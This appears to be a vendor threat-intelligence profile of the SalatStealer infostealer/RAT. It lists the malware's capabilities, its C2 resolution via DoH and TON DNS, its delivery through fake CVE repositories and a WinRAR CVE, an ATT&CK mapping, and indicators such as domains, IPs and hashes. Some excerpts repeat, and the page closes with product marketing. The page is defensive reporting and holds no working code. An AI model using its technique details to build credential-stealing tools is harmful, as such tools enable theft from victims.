SALATSTEALER
SalatStealer is a Go-based Windows malware family, often described as a Malware-as-a-Service infostealer that also includes substantial RAT functionality. Reported samples include UPX-packed or fake-UPX-labeled PE32 binaries. High-confidence capabilities described in the source material include theft of browser credentials, cookies, login data, local state files, authentication tokens, browser session data, cryptocurrency wallet data, Telegram Desktop data, Discord tokens, Steam data, clipboard contents, screenshots, and keylogged input. It targets more than 30 browsers in some reporting, including Chromium-family and Gecko-family browsers, and more than 24 cryptocurrency wallets and numerous wallet-related browser extensions. Reported RAT features include remote shell/command execution, screen capture and recording, webcam capture, microphone capture, hidden desktop interaction, file download, process control, SOCKS5 or P2P proxying, task scheduling, persistence, and self-deletion. Additional reported techniques include Registry Run key persistence, Task Scheduler persistence, Microsoft Defender exclusion abuse, LSASS targeting, token theft, privilege adjustment, COM elevation abuse, and browser secret decryption via DPAPI, App-Bound Encryption bypass, and NSS-related routines.
Its command-and-control design is notably resilient. Reporting states that SalatStealer encrypts its C2 configuration in the binary, resolves infrastructure at runtime via DNS-over-HTTPS, and communicates over WebSocket/HTTPS with QUIC/HTTP3 support. A later sample, yesamsevo.exe, reportedly added TON blockchain DNS resolution using tonutils-go, with fallback to Cloudflare DoH, and periodic re-resolution to rotate C2 infrastructure. Mentioned infrastructure and branding link the malware to the NyashTeam/WebRat MaaS operation, including domains such as nyash[.]team, salat[.]cn, salator[.]es, websalat[.]top, sa1at[.]ru, wrat[.]in, webrat[.]ru, and webrat[.]top, as well as Beget-hosted backend servers at 85.198.98.75 and 217.26.28.234. One report states NyashTeam marketed SalatStealer as WebRAT for about 1,199 RUB per month and used Telegram bots for sales and support.
Observed delivery and distribution vectors in the provided content include phishing and social-engineering campaigns, ClickFix-style fake Google Meet lures, GitHub-hosted payloads and scripts, compromised websites, archives containing executables, and exploitation of a WinRAR vulnerability identified as CVE-2025-8088. CERT-UA and Symantec-linked reporting associates SalatStealer with the UAC-0252 campaign impersonating Ukrainian government institutions and regional authorities, alongside SHADOWSNIFF and DEAFTICK. Other reporting shows SalatStealer being distributed through the Amadey botnet/pay-per-install campaign fbf543, alongside families such as Vidar, LummaStealer, QuasarRAT, XWorm, RustyStealer, and SantaStealer. McAfee also reported cases where a broader trojanized-software campaign ultimately delivered SalatStealer or Mesh Agent.
Targeting and victimology in the source material include Ukrainian government institutions and Ukrainian-speaking organizations in some campaigns, while other distribution activity is commodity cybercrime-oriented and broad. Detection-relevant behaviors explicitly mentioned include ffmpeg.exe abuse via the Windows DirectShow interface for device discovery and active webcam/video capture, use of PowerShell and BITSAdmin for staging, execution from temporary or user-writable directories, and collection/exfiltration of browser and wallet data. Specific file indicators mentioned for SalatStealer include main.exe SHA-256 c149a236ddf07fb96de1a893b8d09cdfdd2c28abfc4c3c17bb3ebd8c3c7b5cef, main.deupx.exe SHA-256 a4f1a6f8f5a407ea0113253b557a6dc75c35398edf21bbc5322c47ac1fd0b689, yesamsevo.exe SHA-256 8651bf3f8f38d547530e0dcdd89da904e14ee7bd87c05f5ff429038ba73013ef, and analyzed sample hashes ec2e071a6241ac4d12452070c37ffde5bd01650c6d9a5503d768cb583fea6756 and 30a50cc0f7b317c9734e6792e7e4ec174035d92031bdcc87a80ad8826adc60b2. Reported network indicators include salat[.]cn/sa1at/ and salator[.]ru/sa1at/.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
UAC-0252 Campaign (Jan--Feb 2026) SalatStealer was deployed alongside three other tools in a campaign targeting Ukraine, tracked as UAC-0252 ... Initial vector: CVE-2025-8088 (WinRAR path traversal) distributed via the PalachPro Telegram channel. | A fresh SalatStealer sample ( yesamsevo.exe ) ships with a previously undocumented capability: resolving its C2 server address via TON blockchain DNS using tonutils-go.
NyashTeam has been distributing SalatStealer through 15+ fake CVE proof-of-concept repositories on GitHub: ... github[.]com/DExplo1ted/CVE-2025-12596-Exploit
NyashTeam has been distributing SalatStealer through 15+ fake CVE proof-of-concept repositories on GitHub: ... github[.]com/h4xnz/CVE-2025-55234-POC
Campaign Context Distribution via Fake CVE PoCs (NyashTeam, Dec 2025 -- present) NyashTeam has been distributing SalatStealer through 15+ fake CVE proof-of-concept repositories on GitHub: github[.]com/RedFoxNxploits/CVE-2025-10294-Poc github[.]com/FixingPhantom/CVE-2025-10294
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The group's arsenal includes an infostealer named SHADOWSNIFF, a Malware-as-a-Service (MaaS) variant called SALATSTEALER, and DEAFTICK, a Go-based backdoor strain.
This analytic detects active video capture performed by FFmpeg (ffmpeg.exe) via the Windows DirectShow (dshow) interface, a technique observed in SalatStealer and related UAC-0252 campaigns.
This analytic detects active video capture performed by FFmpeg (ffmpeg.exe) via the Windows DirectShow (dshow) interface, a technique observed in SalatStealer and related UAC-0252 campaigns.
A fresh SalatStealer sample ( yesamsevo.exe ) ships with a previously undocumented capability: resolving its C2 server address via TON blockchain DNS using tonutils-go.
Techniques & procedures
40 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Resource Development
Initial Access
3 techniques
Initial Access
They either deliver a compressed archive containing a malicious executable file directly, or they provide a link to a compromised website.
Execution
5 techniques
Execution
On execution: mutex check ( checkDupe ), UAC bypass ( Elevate ), persistence via registry Run key and Task Scheduler...
the threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer
the threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer
Persistence
4 techniques
Persistence
On execution: mutex check ( checkDupe ), UAC bypass ( Elevate ), persistence via registry Run key and Task Scheduler...
MITRE ATT&CK Mapping Technique ID Implementation Modify Registry T1112 Registry Run key persistence, Defender exclusion bypass
Privilege Escalation
5 techniques
Privilege Escalation
On execution: mutex check ( checkDupe ), UAC bypass ( Elevate ), persistence via registry Run key and Task Scheduler...
MITRE ATT&CK Mapping Technique ID Implementation ... Process Injection T1055 WriteProcessMemory , SetWindowsHookEx
main.DuplicateUserTokenFromSessionID -- WTS token duplication main.getSystemToken -- SYSTEM token acquisition
Stealth
7 techniques
Stealth
the threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer
MITRE ATT&CK Mapping Technique ID Implementation ... Process Injection T1055 WriteProcessMemory , SetWindowsHookEx
main.DuplicateUserTokenFromSessionID -- WTS token duplication main.getSystemToken -- SYSTEM token acquisition
main.DuplicateUserTokenFromSessionID -- WTS token duplication main.getSystemToken -- SYSTEM token acquisition
Defense Impairment
1 technique
Defense Impairment
Credential Access
8 techniques
Credential Access
main.NtQuerySystemHandles -- Handle enumeration (LSASS targeting) main.findLsassProcess -- LSASS process location
main.runKeylogger -- Start capture main.keyPressCallback -- SetWindowsHookEx WH_KEYBOARD callback main.windowChangeCallback -- Active window change (context labeling)
Collection hits 34 browsers, 28 crypto wallets, Telegram/Discord/Steam tokens, keylogger with window context, screenshots, and clipboard.
The malware’s extensive browser and cryptocurrency wallet targeting highlights the continued operational focus on credential theft, session hijacking, and digital asset compromise.
MITRE ATT&CK Mapping Technique ID Implementation Credentials in Files T1552.001 Browser profile data, wallet files
The malware’s extensive browser and cryptocurrency wallet targeting highlights the continued operational focus on credential theft, session hijacking, and digital asset compromise.
Discovery
3 techniques
Discovery
MITRE ATT&CK Mapping Technique ID Implementation System Information Discovery T1082 Win32_Processor , Win32_LogonSession , HWID
Collection
6 techniques
Collection
The group's arsenal includes an infostealer named SHADOWSNIFF, a Malware-as-a-Service (MaaS) variant called SALATSTEALER
main.runKeylogger -- Start capture main.keyPressCallback -- SetWindowsHookEx WH_KEYBOARD callback main.windowChangeCallback -- Active window change (context labeling)
Command and Control
6 techniques
Command and Control
The transport layer uses gorilla/websocket over HTTPS with QUIC/HTTP3 support (via quic-go). The C2 path is /saat/ with a WebSocket session protocol ( wsSess ) for bidirectional command execution.
Every infected host becomes a SOCKS5 proxy node: main.(*socks5Conn).Serve -- SOCKS5 server ... main.p2pSocks -- P2P SOCKS relay
The actual C2 connection uses WebSocket over TLS for command-and-control, and QUIC (HTTP/3) for bulk data exfiltration.
the threat actor leverages PowerShell, BITSAdmin, and lightweight obfuscation techniques to stage and deploy SalatStealer
A tloop function implements a polling loop that periodically re-resolves via TON, meaning the operator can rotate infrastructure mid-campaign and all infected hosts will follow within one polling interval. This is Fast Flux DNS with the blockchain as the authoritative server.
Exfiltration
1 technique
Exfiltration
IOCs tracked for this family
40 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A malware label applied in public threat intelligence to a hash linked to Tengu activity; the content suggests possible multi-use tooling or classification ambiguity rather than a clearly established separate role.
An information-stealing malware delivered via a ClickFix-style social engineering campaign that abuses legitimate Windows tools such as PowerShell and BITSAdmin. It targets browser data and cryptocurrency wallets to enable credential theft, session hijacking, and digital asset compromise.
A stealer malware family described as abusing FFmpeg on Windows to enumerate connected audio and video devices, likely as reconnaissance for covert audio/video surveillance or collection.
A stealer malware family associated here with webcam/video capture activity via FFmpeg and Windows DirectShow as part of collection and surveillance behavior.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.